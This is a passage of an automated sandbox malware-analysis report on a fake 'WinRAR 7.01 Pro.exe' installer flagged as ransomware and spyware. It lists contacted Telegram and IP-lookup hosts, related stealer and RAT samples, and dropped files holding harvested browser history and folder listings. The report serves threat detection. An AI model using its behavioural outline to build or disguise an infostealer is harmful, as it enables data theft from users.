                  https://aka.ms/odirmwinrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.44.66
                  api.mylnikov.orgUnited States
                  13335CLOUDFLARENETUSfalse
                  149.154.167.220
                  api.telegram.orgUnited Kingdom
                  62041TELEGRAMRUtrue
                  104.16.185.241
                  icanhazip.comUnited States
                  13335CLOUDFLARENETUSfalse
                  IP
                  127.0.0.1
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1492461
                  Start date and time:2024-08-13 21:47:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:WinRAR 7.01 Pro.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.evad.winEXE@21/94@4/4
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 59
                  • Number of non-executed functions: 86
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target WinRAR 7.01 Pro.exe, PID 7492 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: WinRAR 7.01 Pro.exe
                  TimeTypeDescription
                  15:48:53API Interceptor298874x Sleep call for process: _microsoft_corporation.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.21.44.66PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                    viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                      Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                        zrrHgsDzgS.exeGet hashmaliciousAsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRATBrowse
                          H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                            SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                              t3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                vp2Gd0kDCt.exeGet hashmaliciousAsyncRAT, EICAR, RedLine, StormKitty, VenomRATBrowse
                                  a.cmdGet hashmaliciousUnknownBrowse
                                    UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                      149.154.167.220New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                              Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                                  OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          104.16.185.241PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                          • icanhazip.com/
                                                          eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • icanhazip.com/
                                                          5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • icanhazip.com/
                                                          viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • icanhazip.com/
                                                          down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • icanhazip.com/
                                                          7Y18r(198).exeGet hashmaliciousUpatreBrowse
                                                          • icanhazip.com/
                                                          LisectAVT_2403002B_340.exeGet hashmaliciousBdaejec, UpatreBrowse
                                                          • icanhazip.com/
                                                          LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                          • icanhazip.com/
                                                          7Y18r(114).exeGet hashmaliciousUnknownBrowse
                                                          • icanhazip.com/
                                                          7Y18r(114).exeGet hashmaliciousUnknownBrowse
                                                          • icanhazip.com/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          api.mylnikov.orgPasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                          • 104.21.44.66
                                                          eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 172.67.196.114
                                                          83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                          • 104.21.44.66
                                                          viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 104.21.44.66
                                                          LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                          • 172.67.196.114
                                                          2U1S7Ab7YU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 172.67.196.114
                                                          xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                          • 172.67.196.114
                                                          Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                                                          • 104.21.44.66
                                                          zrrHgsDzgS.exeGet hashmaliciousAsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRATBrowse
                                                          • 104.21.44.66
                                                          H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 104.21.44.66
                                                          api.telegram.orgNew Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          icanhazip.comPasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                          • 104.16.185.241
                                                          eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 104.16.185.241
                                                          83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                          • 104.16.184.241
                                                          5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • 104.16.185.241
                                                          Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • 104.16.184.241
                                                          viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                          • 104.16.185.241
                                                          down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • 104.16.185.241
                                                          7Y18r(198).exeGet hashmaliciousUpatreBrowse
                                                          • 104.16.185.241
                                                          LisectAVT_2403002B_340.exeGet hashmaliciousBdaejec, UpatreBrowse
                                                          • 104.16.185.241
                                                          LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                          • 104.16.185.241
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TELEGRAMRUNew Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 149.154.167.220
                                                          CLOUDFLARENETUShttps://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                                                          • 104.18.0.16
                                                          New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.67.152
                                                          https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1Get hashmaliciousUnknownBrowse
                                                          • 104.16.225.240
                                                          http://cdnpixelnetworks.netGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          http://www.ms4x.netGet hashmaliciousUnknownBrowse
                                                          • 162.159.135.232
                                                          https://reviewm4law.rpabox.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.16.168
                                                          formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          TETA KAZAN REVISED OFFERS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          http://marvin-occentus.net/statisticGet hashmaliciousUnknownBrowse
                                                          • 104.22.2.142
                                                          Reimbursement.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 188.114.96.3
                                                          CLOUDFLARENETUShttps://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                                                          • 104.18.0.16
                                                          New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.67.152
                                                          https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1Get hashmaliciousUnknownBrowse
                                                          • 104.16.225.240
                                                          http://cdnpixelnetworks.netGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          http://www.ms4x.netGet hashmaliciousUnknownBrowse
                                                          • 162.159.135.232
                                                          https://reviewm4law.rpabox.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.16.168
                                                          formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          TETA KAZAN REVISED OFFERS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          http://marvin-occentus.net/statisticGet hashmaliciousUnknownBrowse
                                                          • 104.22.2.142
                                                          Reimbursement.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 188.114.96.3
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eNew Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1Get hashmaliciousUnknownBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          formu.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          TETA KAZAN REVISED OFFERS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          Firstontario Caller VM_00_94 Seconds REF#e764f827cc206df3733c6c719eb86bc36b5f54d1 7_9_2024Get hashmaliciousUnknownBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          https://clicks.aweber.com/y/ct/?l=VYSw&m=gN6rWonkUwz1e3P&b=ts_kMXzkVy8._uTi9_tW3A#MYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          http://cert-authshare.continentalcs.info/?PDuS=90Get hashmaliciousUnknownBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          https://shared.outlook.inky.comGet hashmaliciousUnknownBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          trucking instructions.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          https://pbmsfactiprojconsult.switzerlandnorth.cloudapp.azure.com/?rpu=800220101041&serie=WF&folio=000011619963&hash=186730d692393fb939f986343589efe9&ta=1&idC=999972517&idA=103902931Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.21.44.66
                                                          • 149.154.167.220
                                                          No context
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                          Category:modified
                                                          Size (bytes):162325
                                                          Entropy (8bit):7.957719950382636
                                                          Encrypted:false
                                                          SSDEEP:3072:/JTSo6agYLXaUC+UkDolZUBK8PzCUrNB/CBC1xDTCjLCIH20BI8N/cHDd3TLxRjN:/J+o6VYLKUCBkDqZUB7CUPakbPCjLClt
                                                          MD5:786765617208B8DFDF8FAAD9A03589CD
                                                          SHA1:6FCA679C48A796036CF9851E89471C632D2D1B50
                                                          SHA-256:0C7E58043B23DF4C5F387E2469CC8248AFAEED420FCB9DF75FAC9DD6BB320E81
                                                          SHA-512:7F8F11006B7B1510EB8082532911AB226702C23DF37199EA9FBC0B4A536F5E074E7E7213C8868623C295D78E0E7710B12CD80B889504DAB8C080CE64D33A4E43
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:PK........x..Y................Browsers\Edge\PK.........~.YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........~.Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK.........~.Y..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK.........~.Y.5^.....:.......Directories\Desktop.txte..N.0...c.;..4.....R:...J......q\..zG..t.sr...si{>}........R.J..H...,Q.Xe...}NO..r!=...h..!...Bj.....W.%..........$.rh..I-U/.h.!.....yP.../..)^&....l......Yik.(I.f~a+#.il.E!..9..........
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):105
                                                          Entropy (8bit):3.8863455911790052
                                                          Encrypted:false
                                                          SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                          MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                          SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                          SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                          SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-8 text
                                                          Category:dropped
                                                          Size (bytes):94
                                                          Entropy (8bit):4.886397362842801
                                                          Encrypted:false
                                                          SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                          MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                          SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                          SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                          SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                          Malicious:false
                                                          Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1393
                                                          Entropy (8bit):5.241470443395582
                                                          Encrypted:false
                                                          SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                          MD5:7F24357FFA354F2471DED45552B897D7
                                                          SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                          SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                          SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                          Malicious:false
                                                          Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):570
                                                          Entropy (8bit):5.2399925009866575
                                                          Encrypted:false
                                                          SSDEEP:12:wvShNN0OLxyZDysNLN4/nNNu/lJOLXvna6y72vW8LKP4PXsgFzLXjo4LaGDysjUW:VNqkxCD/oO/lJkXyyAP4PXVFnXjpaGDb
                                                          MD5:49824B8B4E7C09A418615CEB57A23F62
                                                          SHA1:D126761842542E010B45EBEE6F04995BE6E6AEC2
                                                          SHA-256:39F45D15086E1C25E159D3C1E8AAC1144C4A87F2832B73484B8310A4DDE998ED
                                                          SHA-512:1D271933FB0CBFE8858857157DD0834D52DD6594045AF84C9B6FA4ED2237B9806724862B94950A5FF623918D034644DE90323DAE2B5D7BAC5B8FFBC6E1A6080B
                                                          Malicious:false
                                                          Preview:Desktop\...DVWHKMNFNN\....DVWHKMNFNN.docx....KZWFNRXYKI.mp3....LTKMYBSEYZ.xlsx....NWTVCDUMOB.pdf....WUTJSCBCFX.jpg....YPSIACHYXW.png...JSDNGYCOWY\...LTKMYBSEYZ\....BPMLNOBVSB.png....FENIVHOIKN.mp3....KZWFNRXYKI.pdf....LTKMYBSEYZ.docx....WUTJSCBCFX.xlsx....ZBEDCJPBEY.jpg...VAMYDFPUND\...WKXEWIOTXI\...ZBEDCJPBEY\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...Excel.lnk...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WinRAR 7.01 Pro.exe...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):690
                                                          Entropy (8bit):5.317483724691566
                                                          Encrypted:false
                                                          SSDEEP:12:xhNN0OLxyZDysNLN4/nNNu/lJOLXvnwFPLKQ4wRLKTLKBLKMkLKq6y72vW8LKPLK:nNqkxCD/oO/lJkXIYxrqEEqyAPcFnXjl
                                                          MD5:0F23BB782A132F1B673F31951668D642
                                                          SHA1:34B2E3D87B78CB0C4CC833C8887973EC0EA8227F
                                                          SHA-256:805ADDDED683B72E58E047C021037DB64FD27C21BD925E4819D7D7A187E80703
                                                          SHA-512:94579DCFDC0507F280B9D0A86E73F5023082381E5C45E04A0E33E84B6F3FA1D2597D11222E7F0004CF61E736D8F8299686DDCDF5244261E864A58DA2799E94A8
                                                          Malicious:false
                                                          Preview:Documents\...DVWHKMNFNN\....DVWHKMNFNN.docx....KZWFNRXYKI.mp3....LTKMYBSEYZ.xlsx....NWTVCDUMOB.pdf....WUTJSCBCFX.jpg....YPSIACHYXW.png...JSDNGYCOWY\...LTKMYBSEYZ\....BPMLNOBVSB.png....FENIVHOIKN.mp3....KZWFNRXYKI.pdf....LTKMYBSEYZ.docx....WUTJSCBCFX.xlsx....ZBEDCJPBEY.jpg...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...VAMYDFPUND\...WKXEWIOTXI\...ZBEDCJPBEY\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):234
                                                          Entropy (8bit):5.239944244201294
                                                          Encrypted:false
                                                          SSDEEP:6:3tcKP8LKIy/jPoPd0OLXjohOLaGDysNumy8xukSQNVk4hv:aW8LKPLgFzLXjo4LaGDysHxZD
                                                          MD5:010591172DCC0841FC57D23250751DE4
                                                          SHA1:10C8DFC913782FC436E1C5891A09F222C5F6E2AF
                                                          SHA-256:01C2D9DCE0665D79D1804169E3DD9CC36EDEDE6831C66A4D597AFE9C33354F1B
                                                          SHA-512:B0836EA4887A6BD10DF011C0C6366FB35E67EF47325DDF54F297EE228644D25BC2ADE6C3984964EC9D38EBFAE204DF120FD770CE4C1D1EC13353A0537924A7E6
                                                          Malicious:false
                                                          Preview:Downloads\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.023465189601646
                                                          Encrypted:false
                                                          SSDEEP:3:1hiR8LKB:14R8LKB
                                                          MD5:966247EB3EE749E21597D73C4176BD52
                                                          SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                          SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                          SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                          Malicious:false
                                                          Preview:OneDrive\...desktop.ini..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):88
                                                          Entropy (8bit):4.450045114302317
                                                          Encrypted:false
